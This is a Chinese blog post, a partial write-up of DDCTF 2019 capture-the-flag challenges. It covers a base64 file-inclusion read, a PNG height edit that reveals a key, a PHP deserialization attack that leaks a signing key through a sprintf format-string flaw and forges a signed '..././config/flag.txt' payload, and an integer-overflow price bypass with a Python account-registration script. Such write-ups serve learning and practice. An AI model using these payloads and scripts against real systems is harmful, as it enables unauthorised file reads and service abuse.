<!DOCTYPE html>
<html>
  <!-- Html Head Tag-->
  <head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content>
  <meta name="author" content="gelinlang">
  <!-- Open Graph Data -->
  <meta property="og:title" content="DDCTF-2019-部分-writeup">
  <meta property="og:description" content="路漫漫求修远兮，我将上下而求索">
  <meta property="og:site_name" content="gelinlang&#39;s Blog">
  <meta property="og:type" content="article">
  <meta property="og:image" content="http://gelinlang.cn">
  
    <link rel="alternate" href="/atom.xml" title="gelinlang&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  

  <!-- Site Title -->
  <title>gelinlang's Blog</title>

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="/css/bootstrap.min.css">
  <!-- Custom CSS -->
  
  <link rel="stylesheet" href="/css/style.light.css">

  <!-- Google Analytics -->
  

</head>

  <body>
    <!-- Page Header -->


<header class="site-header header-background" style="background-image: url(/img/default-banner-dark.jpg)">
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="page-title with-background-image">
          <p class="title">DDCTF-2019-部分-writeup</p>
          <p class="subtitle"></p>
        </div>
        <div class="site-menu with-background-image">
          <ul>
            
              <li>
                <a href="/">
                  
                  Home
                  
                </a>
              </li>
            
              <li>
                <a href="/archives">
                  
                  Archives
                  
                </a>
              </li>
            
              <li>
                <a href="/tags/ || tages">
                  
                  tags
                  
                </a>
              </li>
            
              <li>
                <a href="/categories/ || th">
                  
                  categories
                  
                </a>
              </li>
            
              <li>
                <a href="/gelinlang@163.com">
                  
                  Email
                  
                </a>
              </li>
            
          </ul>
        </div>
      </div>
    </div>
  </div>
</header>

<article>
  <div class="container typo">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="post-info text-muted">
          
            <!-- Author -->
            <span class="author info">By gelinlang</span>
          
          <!-- Date -->
          <span class="date-time info">On
            <span class="date">2019-04-23</span>
            <span class="time">22:12:25</span>
          </span>
          
          <!--  Categories  -->
            <span class="categories info">Under 

<a href="/categories/CTF/">CTF</a>
</span>
          
        </div>
        <!-- Tags -->
        
        <!-- Post Main Content -->
        <div class="post-content">
          <p>只做出一道web，一道misc，好菜。接下来看大佬的wp学习下吧。</p>
<p>#<strong>web1</strong><br>打开链接，可以看到可能存在文件包含的url，有base64编码的参数，，经2次base64解密加转字符串为flag.php。<br>审查元素，可以看到图片的base64编码。<br> <a id="more"></a><br><img src="https://upload-images.jianshu.io/upload_images/16514845-2665915ca1ce62d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>接下来将index.php先转16进制然后经2次base64编码，提交，将返回的base64解码得到index.php源代码。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-d2a90a3c551db34d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>可以知道，我们传进去的jpg参数成为文件名然后被读取。接下来就是找到flag文件名了。<br>然后脑洞大开，我们可以看到源代码上面有个博客，还有个日期，我们访问，并且找到对应日期的那篇，里面提到了一个文件practice.txt.swp，访问它，得到一个文件名。然后按照刚才的操作传递给jpg，这里的!用config代替。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-14da53935048fd5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>将返回的base64解码得到f1ag!ddctf.php的源代码。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-2e0da3154b736316.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>其中extract($_GET);是将你get提交的参数进行赋值。利用php伪协议绕过。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-339fdb979a1d877c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p>#<strong>Wireshark</strong><br>用wireshark打开，导出所有http，可以看到有一个img_add_info是在线图片加解密的网站，并且，还有两个图片文件。<br>打开网站可以看到可以上传解密图片，并且还需要密码。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-0e1da61176efb9cc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>去掉开头的无用内容。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-76843144a40fadec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>保存为png，可以看到有两个图片。有一个带有钥匙，并且明显宽高比例差距很大，因此修改下高的大小。我们先看图片信息，为1600x544，我们将它改为1600x1600。用winhex打开。将0220改为0640。（544对应的十六进制为0220，1600对应0640）<br><img src="https://upload-images.jianshu.io/upload_images/16514845-b5be40f51a31a201.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>然后保存图片可以得到key<br><img src="https://upload-images.jianshu.io/upload_images/16514845-e831b7e64c199aad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>在开始的网站解密另一张图片，得到十六进制字符串，转码得到flag。DDCTF{NbuiBUlR5lhww2OfpEmueZd64OlRJ1D2}</p>
<p>#<strong>web签到题</strong><br>打开页面提示，权限不够。抓包，可以看到有个didictf_username参数为空，改为admin，访问，得到返回/app/fL2XID2i0Cdh.php。访问得到源代码。接下来代码审计。</p>
<p>Application.php里有一个Application类，auth函数就是检测didictf_username是否为admin。重点是__destruct函数，用过构造path，利用它可以读取我们想要的文件。path要满足长度为18，并且将../替换为空，用双写绕过即可。</p>
<p>Session.php代码很长，看重点部分。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$hash = substr($session,strlen($session)-32);</span><br><span class="line">       $session = substr($session,0,strlen($session)-32);</span><br><span class="line"></span><br><span class="line">       if($hash !== md5($this-&gt;eancrykey.$session)) &#123;</span><br><span class="line">           parent::response(&quot;the cookie data not match&quot;,&apos;error&apos;);</span><br><span class="line">           return FALSE;</span><br><span class="line">       &#125;</span><br><span class="line">       $session = unserialize($session);</span><br></pre></td></tr></table></figure></p>
<p>对session了进行反序列化，这里就是要利用反序列化创建Application，然后读取文件。<br>所以思路就是传入构造的session，通过session反序列化，创建Application对象，利用destruct函数读取文件。<br>但是他对session做了签名，判断传入的session最后32位是否等于md5(eancrykey.$session)，所以就要知道eancrykey的值。当时做题的时候就卡在这里。看到有个注释 说key建议为8位字符串，还想去爆破。。。</p>
<p>接下来看eancrykey出现的位置，有两处。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">private function get_key() &#123;</span><br><span class="line">       //eancrykey  and flag under the folder</span><br><span class="line">       $this-&gt;eancrykey =  file_get_contents(&apos;../config/key.txt&apos;);</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line">if(!empty($_POST[&quot;nickname&quot;])) &#123;</span><br><span class="line">           $arr = array($_POST[&quot;nickname&quot;],$this-&gt;eancrykey);</span><br><span class="line">           $data = &quot;Welcome my friend %s&quot;;</span><br><span class="line">           foreach ($arr as $k =&gt; $v) &#123;</span><br><span class="line">               $data = sprintf($data,$v);</span><br><span class="line">           &#125;</span><br><span class="line">           parent::response($data,&quot;Welcome&quot;);</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure></p>
<p>上面那个不可能，重点关注下面那个。我们随便提交个nickname，可以看到。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-1828fb8086a74558.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="0.png"><br>当我们传入的nickname为hello的时候，第一次赋值后，data将变为Welcome my friend hello。后面的eancrykey，已经没有占位符了。<br>所以传入nickname为%s，第一次赋值后，data还是Welcome my friend hello %s，第二次辅助就会将eancrykey返回。得到为EzblrbNS。<br>接下来就好办了，构造path为…/./config/flag.txt(注释提示了flag和key同一个文件)。将其序列化。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-cb6cc77e0a5e485b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">//序列化</span><br><span class="line">O:11:&quot;Application&quot;:1:&#123;s:4:&quot;path&quot;;s:21:&quot;..././config/flag.txt&quot;;&#125;</span><br><span class="line">//加上MD5签名</span><br><span class="line">O:11:&quot;Application&quot;:1:&#123;s:4:&quot;path&quot;;s:21:&quot;..././config/flag.txt&quot;;&#125;5a014dbe49334e6dbb7326046950bee2</span><br><span class="line">//url编码</span><br><span class="line">O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22...%2F.%2Fconfig%2Fflag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2</span><br></pre></td></tr></table></figure></p>
<p>提交得到flag。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-cd1c09501df7c839.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p>#<strong>大吉大利,今晚吃鸡~</strong><br>按流程走一遍，注册账号，然后购买券。支付，但是支付的时候需要2000，余额只有100。因此在购买的时候抓包，修改price，但是测试发现只能修改成比2000大，想到可能是溢出。用这个插件可以看到是go语言写的。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-15fca769ea6ccabd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>搜一下go语言的数据类型，一个一个试。当price为4294967295是返回500，出现异常。提交price为4294967296。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-9cac72aa377e9ae7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>可以看到支付成功，并返回了一个id和ticket，通过id和ticket可以移除对手，接下来就是从哪去找。<br>又重新注册个账号，买券，得到id和ticket。然后在刚才那个账号中去移除，可以发现移除成功，剩余人数99人。接下来编写脚本，注册账号，买票，支付，得到id和ticket，然后用第一次那个账号移除它<br><img src="https://upload-images.jianshu.io/upload_images/16514845-cae9b017bff54edc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url_register = &quot;http://117.51.147.155:5050/ctf/api/register?name=&#123;&#125;&amp;password=&#123;&#125;&quot;</span><br><span class="line">url_buy = &quot;http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296&quot;</span><br><span class="line">url_pay = &quot;http://117.51.147.155:5050//ctf/api/pay_ticket?bill_id=&#123;&#125;&quot;</span><br><span class="line">url_remove = &quot;http://117.51.147.155:5050/ctf/api/remove_robot?id=&#123;&#125;&amp;ticket=&#123;&#125;&quot;</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    &quot;Cookie&quot;: &quot;user_name=gelinlang; REVEL_SESSION=2f73da6d52afd64e0641fcc79e0b781e&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">for i in range(1, 777):</span><br><span class="line">    res = requests.session()</span><br><span class="line">    user = res.get(url_register.format(&quot;gelinlang&quot;+str(i), 12345678))</span><br><span class="line">    buy = res.get(url_buy)</span><br><span class="line">    #print(buy.json())</span><br><span class="line">    id = buy.json()[&quot;data&quot;][0][&quot;bill_id&quot;]</span><br><span class="line">    #print(id)</span><br><span class="line">    pay = res.get(url_pay.format(id))</span><br><span class="line">    id = pay.json()[&apos;data&apos;][0][&quot;your_id&quot;]</span><br><span class="line">    ticket = pay.json()[&quot;data&quot;][0][&quot;your_ticket&quot;]</span><br><span class="line">    #print(id, ticket)</span><br><span class="line">    gelinlang = requests.get(url_remove.format(id, ticket), headers=headers)</span><br><span class="line">    print(gelinlang.text)</span><br><span class="line">    time.sleep(0.5)</span><br></pre></td></tr></table></figure>
<p>一直跑直到最后最后吃鸡，得到flag。<br><img src="https://upload-images.jianshu.io/upload_images/16514845-f9e03913d146703e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>

        </div>
      </div>
    </div>
  </div>
</article>



    <!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <p class="copyright text-muted">
          Theme By <a target="_blank" href="https://github.com/levblanc">Levblanc.</a>
          Inspired By <a target="_blank" href="https://github.com/klugjo/hexo-theme-clean-blog">Clean Blog.</a>
        </p><p class="copyright text-muted">
          Powered By <a target="_blank" href="https://hexo.io/">Hexo.</a>
        </p>
      </div>
    </div>
  </div>
</footer>


    <!-- After Footer Scripts -->
<script src="/js/highlight.pack.js"></script>
<script>
  document.addEventListener("DOMContentLoaded", function(event) {
    var codeBlocks = Array.prototype.slice.call(document.getElementsByTagName('pre'))
    codeBlocks.forEach(function(block, index) {
      hljs.highlightBlock(block);
    });
  });
</script>

  </body>
</html>

